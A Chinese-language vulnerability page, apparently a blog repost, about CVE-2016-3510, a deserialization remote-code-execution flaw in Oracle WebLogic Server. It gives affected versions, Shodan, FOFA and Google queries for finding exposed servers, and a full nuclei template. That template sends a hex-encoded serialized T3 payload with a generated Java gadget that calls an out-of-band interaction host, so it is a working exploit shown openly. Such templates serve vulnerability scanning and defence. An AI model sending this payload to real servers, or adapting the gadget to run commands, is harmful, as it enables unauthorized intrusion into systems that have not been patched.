Oracle WebLogic Server Java Object Deserialization - Remote Code Execution

漏洞信息

漏洞名称: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution

漏洞编号:

  • CVE: CVE-2016-3510

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: 该漏洞影响Oracle WebLogic Server,这是Oracle Fusion Middleware的一个组件,广泛用于企业级服务和应用部署。WebLogic Server是一个高性能的Java EE应用服务器,支持大规模分布式计算和关键业务应用的部署。由于其广泛的应用,该漏洞的影响范围较大。

漏洞类型为反序列化漏洞,技术根源在于WebLogic Server的WLS Core Components组件中存在未指定的漏洞,攻击者可以通过构造恶意的序列化对象,利用T3协议进行远程代码执行。这种漏洞通常由于对用户输入的反序列化操作缺乏充分的验证和过滤,导致攻击者可以注入恶意代码。

该漏洞的严重性在于它允许远程攻击者在未授权的情况下影响系统的机密性、完整性和可用性。攻击者可以利用此漏洞执行任意代码,可能导致数据泄露、服务中断或其他恶意操作。由于攻击不需要用户交互,且可以通过网络自动执行,因此该漏洞的风险极高。企业应立即应用Oracle提供的补丁以防止潜在的攻击。

产品厂商: Oracle

产品名称: WebLogic Server

影响版本: 10.3.6.0, 12.1.3.0, 12.2.1.0

搜索语法: product:”oracle weblogic”, http.title:”oracle peoplesoft sign-in”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/8df03a0dd3f796dcbd6ce9d748e5d96c3b5af09f/network%2Fcves%2F2016%2FCVE-2016-3510.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

id: CVE-2016-3510

info:
  name: Oracle WebLogic Server Java Object Deserialization -  Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
  remediation: |
    Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016.
  reference:
    - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py
    - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html
    - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
    - http://www.securitytracker.com/id/1036373
    - https://www.tenable.com/security/research/tra-2016-21
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-3510
    cwe-id: CWE-119
    epss-score: 0.93179
    epss-percentile: 0.99789
    cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: oracle
    product: weblogic_server
    shodan-query:
      - product:"oracle weblogic"
      - http.title:"oracle peoplesoft sign-in"
    fofa-query: title="oracle peoplesoft sign-in"
    google-query: intitle:"oracle peoplesoft sign-in"
  tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp

variables:
  start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"
  end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078"

tcp:
  - inputs:
      - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
        read: 1024

      - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}"

    host:
      - "{{Hostname}}"
      - "{{Host}}:7001"

    read-size: 4
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100ea029832c0ab04118402ee3841955fe976f1a6733c03db8927824a3743216230022100da060ca8b653feeaf33f063732129911e95190383cbf70f8e7c43c1288f8f837:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #反序列化
Oracle WebLogic Server Java Object Deserialization - Remote Code Execution
http://example.com/2025/07/07/github_544971439/
作者
lianccc
发布于
2025年7月7日
许可协议